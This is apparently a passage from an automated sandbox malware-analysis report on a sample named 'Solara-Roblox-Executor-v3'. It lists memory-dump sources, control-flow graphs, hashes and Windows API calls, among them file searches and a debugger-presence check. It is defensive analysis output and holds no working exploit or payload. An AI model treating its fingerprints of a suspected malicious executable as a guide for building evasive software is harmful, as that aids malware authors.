                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID:
                                                                                          • API String ID: 3000768030-0
                                                                                          • Opcode ID: 1ea712bdbbf93370689142905d3e9c187bf47dafe0b0ac6bd5820546b3e3b799
                                                                                          • Instruction ID: f0e93c91a8930994ef83ae0f47ccc1521d145affd6dc4b45fb428686c2db353a
                                                                                          • Opcode Fuzzy Hash: 1ea712bdbbf93370689142905d3e9c187bf47dafe0b0ac6bd5820546b3e3b799
                                                                                          • Instruction Fuzzy Hash: A111063190E7814AC7368E3E8CA86227A9CAB56370B390B5DE4B6865F1C630F846C690

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 002F2038
                                                                                          • GetModuleFileNameW.KERNEL32 ref: 002F2058
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Module$FileHandleName
                                                                                          • String ID:
                                                                                          • API String ID: 4146042529-0
                                                                                          • Opcode ID: 26a928d1b395e2c4fd95762d2f08a9f30059e28fec36abd3a1cdac8f880cf5dc
                                                                                          • Instruction ID: 81029d6d838eab0b4aa37356dcf7f9ab90240132f5565f97cfd98ef505784a07
                                                                                          • Opcode Fuzzy Hash: 26a928d1b395e2c4fd95762d2f08a9f30059e28fec36abd3a1cdac8f880cf5dc
                                                                                          • Instruction Fuzzy Hash: 4C012CB09053088FD715EF68D54529EBBF8BB08300F4044ADE899D3341EB305A888F52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 310 3064f3-306502 call 306862 313 306504-306529 LCMapStringEx 310->313 314 30652b-306545 call 30658f LCMapStringW 310->314 318 30654b-30654d 313->318 314->318
                                                                                          APIs
                                                                                          • LCMapStringEx.KERNELBASE(?,00306F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00306527
                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00306F1A,?,?,-00000008,?,00000000), ref: 00306545
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID:
                                                                                          • API String ID: 2568140703-0
                                                                                          • Opcode ID: 3e140b5639bc40fe690e9242871d7fbaa6d84b963e9b0a16896540deb6cfbd2e
                                                                                          • Instruction ID: 4464cd9d229cf2a3cbc32d1fb7c8f18f41061016bfe088ae67b7e54c98385665
                                                                                          • Opcode Fuzzy Hash: 3e140b5639bc40fe690e9242871d7fbaa6d84b963e9b0a16896540deb6cfbd2e
                                                                                          • Instruction Fuzzy Hash: CCF0683240111ABBCF136F91DC269DE3F2AEB497A0F058510BA1825064C736CA31AB91

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 319 3056b7-3056c0 320 3056c2-3056d5 RtlFreeHeap 319->320 321 3056ef-3056f0 319->321 320->321 322 3056d7-3056ee GetLastError call 30135d call 301314 320->322 322->321
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056CD
                                                                                          • GetLastError.KERNEL32(?,?,00309A64,?,00000000,?,?,00309704,?,00000007,?,?,0030A04A,?,?), ref: 003056D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 5690615bb726f6cfc03a81ac56eb615da5eda314d0e45e214869a79d00945222
                                                                                          • Instruction ID: bb85d68e2dc9e215e76999d03d235e313cd2d84309231986c194423e7d1f3bbf
                                                                                          • Opcode Fuzzy Hash: 5690615bb726f6cfc03a81ac56eb615da5eda314d0e45e214869a79d00945222
                                                                                          • Instruction Fuzzy Hash: C1E0C232102618BBCF232FA8EC0CBCA7B9CDF44B52F155060FA0C8A0E0CB328850CB94

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 327 2f14c0-2f152f call 303330 call 2f3070 332 2f1535-2f1555 call 2f3070 327->332 333 2f1560-2f156a 327->333 340 2f156f-2f1592 call 2f3070 332->340 341 2f155b 332->341 335 2f1597-2f15be call 2f3090 call 2f31a0 333->335 346 2f15c4-2f15cd 335->346 347 2f15d2-2f162c call 2f3370 call 2f31c0 call 2f33a0 call 2f3410 335->347 340->335 341->333 348 2f18b5-2f1903 call 2f35f0 call 2f3640 346->348 363 2f1632 347->363 364 2f16e1 347->364 365 2f1637-2f1643 363->365 366 2f16e6-2f16ef 364->366 367 2f16dc 365->367 368 2f1649-2f16b1 call 2f3450 call 2f3520 call 2f3470 call 2f3540 call 2f3430 365->368 369 2f1707-2f170c 366->369 370 2f16f5-2f1704 366->370 367->364 412 2f16bc-2f16c5 368->412 413 2f16b7-2f16d7 368->413 371 2f1717-2f175c call 2f3450 call 2f3550 call 2f3470 369->371 372 2f1712-2f17c0 369->372 370->369 399 2f1761-2f178d call 2f3540 call 2f3430 371->399 377 2f17c6 372->377 378 2f1891-2f18b0 call 2f35a0 372->378 382 2f17cb-2f17d7 377->382 378->348 393 2f1835-2f183c 378->393 386 2f17dd-2f1820 call 2f3450 call 2f3520 call 2f3470 382->386 387 2f188c 382->387 386->393 414 2f1841-2f1861 call 2f3540 call 2f3430 386->414 387->378 393->348 418 2f1798-2f179e 399->418 419 2f1793 399->419 412->367 413->365 424 2f186c-2f1875 414->424 425 2f1867-2f1887 414->425 421 2f17a1-2f17b7 418->421 419->421 421->366 424->387 425->382
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID:
                                                                                          • API String ID: 4218353326-0
                                                                                          • Opcode ID: 6dd1bad8b6ad8d7bf010c63a5eac92b0d2d6546e74b4cbdf1f6c53cbb4fa1403
                                                                                          • Instruction ID: 180d66e4e508ac60214dec6b5049e25f50abfba7b7336fbc988b9f92c72c0c88
                                                                                          • Opcode Fuzzy Hash: 6dd1bad8b6ad8d7bf010c63a5eac92b0d2d6546e74b4cbdf1f6c53cbb4fa1403
                                                                                          • Instruction Fuzzy Hash: FFD10474624B48CFC724DF28C154A76FBE0BF48794B508A2DE98B8BB91D774E924CB41
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000083,?,00000005,003076B8,?), ref: 00307869
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-0
                                                                                          • Opcode ID: 0c66cc733687d4abaecb9389fdc94296e1e437ed28c32766f67f435a7ff839a7
                                                                                          • Instruction ID: db51d14b565ed507916cf7caa24b7c5f2de282a7c3d3d5d643fdf812fa059b4f
                                                                                          • Opcode Fuzzy Hash: 0c66cc733687d4abaecb9389fdc94296e1e437ed28c32766f67f435a7ff839a7
                                                                                          • Instruction Fuzzy Hash: 70514BB1D0A159AEDB128A28CD98BE9BBADEF15300F1441E9E599C71C2D331BD45CFA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 495baf2036b2db023e16e51de3eca66404309fd36d90ac66526cab89657b12ba
                                                                                          • Instruction ID: 647183399d3418e81d6e6e1ce84b3d7752f712a54d95dfbbfb78a90e67fc4121
                                                                                          • Opcode Fuzzy Hash: 495baf2036b2db023e16e51de3eca66404309fd36d90ac66526cab89657b12ba
                                                                                          • Instruction Fuzzy Hash: C2414A32A2011EABCB14DF68C4909FEF7B9BF08350B544179E646E7640EB31E965DF90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b941cb9c52b18cefaf0383c9f20598a30bbdc107185b00c7b0cfdf1cb81b5eb7
                                                                                          • Instruction ID: 0b06d502ce3870441f6e57a96d8335a99a6be48d280a37edf223015ee61792f6
                                                                                          • Opcode Fuzzy Hash: b941cb9c52b18cefaf0383c9f20598a30bbdc107185b00c7b0cfdf1cb81b5eb7
                                                                                          • Instruction Fuzzy Hash: 8501F9336011149FDB178F6CEC9295633AEFBC4B64B254128F910870D8DB319C218BD0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00307675,?,?,00307675,00000220,?,?,?), ref: 00305723
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 9cd7682c64c69517ca9453387ec8031d321602c7c7b88cd474a31393945cf93a
                                                                                          • Instruction ID: 16cdd4cf9f778a6f65865186c2f2faeb2b6895bca9561f9452684e19c6aac994
                                                                                          • Opcode Fuzzy Hash: 9cd7682c64c69517ca9453387ec8031d321602c7c7b88cd474a31393945cf93a
                                                                                          • Instruction Fuzzy Hash: 8CE09231203A25E6DB336A799C21B9F769CDF41FF0F164120FD059A4D0EB60CC01A9E5
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: 4949033d566d2f369919aac3f32957324ad99ec0e16d57e41472946b63724312
                                                                                          • Instruction ID: 53a7c34850cb0d090b82a8e9ea050951c58ee96ea077da726c5487a3f9e9c6e0
                                                                                          • Opcode Fuzzy Hash: 4949033d566d2f369919aac3f32957324ad99ec0e16d57e41472946b63724312
                                                                                          • Instruction Fuzzy Hash: 4ED23B71E082298FDB6ACE28DD407EAB7B9EB48305F1541EAD50DE7240DB74AEC58F41
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B250
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B279
                                                                                          • GetACP.KERNEL32(?,?,0030AB6D,?,00000000), ref: 0030B28E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
                                                                                          • Instruction ID: abcaf97f236f6d72d2a5043d4d062305fce9e4913a61c9d438fdd12d8d4a9a30
                                                                                          • Opcode Fuzzy Hash: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
                                                                                          • Instruction Fuzzy Hash: BA21C532A02100AADB378F64C925B9FF3AEEF54F50B578824E90ADB294E732DD41C350
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0030AB3F
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0030AB7D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0030AB90
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0030ABD8
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0030ABF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
                                                                                          • Instruction ID: 78f7f2b1c54494b9cc86126a0cf5c21d200e17ef3dc06c8e622420efaa23a78a
                                                                                          • Opcode Fuzzy Hash: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
                                                                                          • Instruction Fuzzy Hash: 27519471A027059FEB12DFA8EC55ABE73B9FF09700F064529E901EB1D0E7709940CB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: 781ac102b92681d1c59e79af2b9a988f987b3972b0fb4f9c7752eb7cbea5dee2
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: 12025DB1E022199BDF15CFA9C8906AEFBF5FF48314F258269E515E7380D731AA45CB80
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030B889
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: 937d2504eabc46c278975641e44f67ea085bbc0e956d8451dc7e0538386f50c6
                                                                                          • Instruction ID: cf24d8ac30b336bc370e792addcc6b196c9a7d920ebea12d0ea301eb76e1225b
                                                                                          • Opcode Fuzzy Hash: 937d2504eabc46c278975641e44f67ea085bbc0e956d8451dc7e0538386f50c6
                                                                                          • Instruction Fuzzy Hash: C271E47190615C5FDF22AF28CCA9AFAF7B8EF49300F1541D9E409A7291DB314E849F10
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002F9A7F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 002F9B4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002F9B64
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 002F9B6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
                                                                                          • Instruction ID: df8069bf4fc76e0afe065c92a68902d7d536987cf68e06bfe3353b8ffba49f93
                                                                                          • Opcode Fuzzy Hash: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
                                                                                          • Instruction Fuzzy Hash: 8D312575D0522D9BDB21EFA4D949BCDBBB8AF08340F1041EAE50CAB250EB719A848F45
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002FA347
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 002FA356
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 002FA35F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 002FA36C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
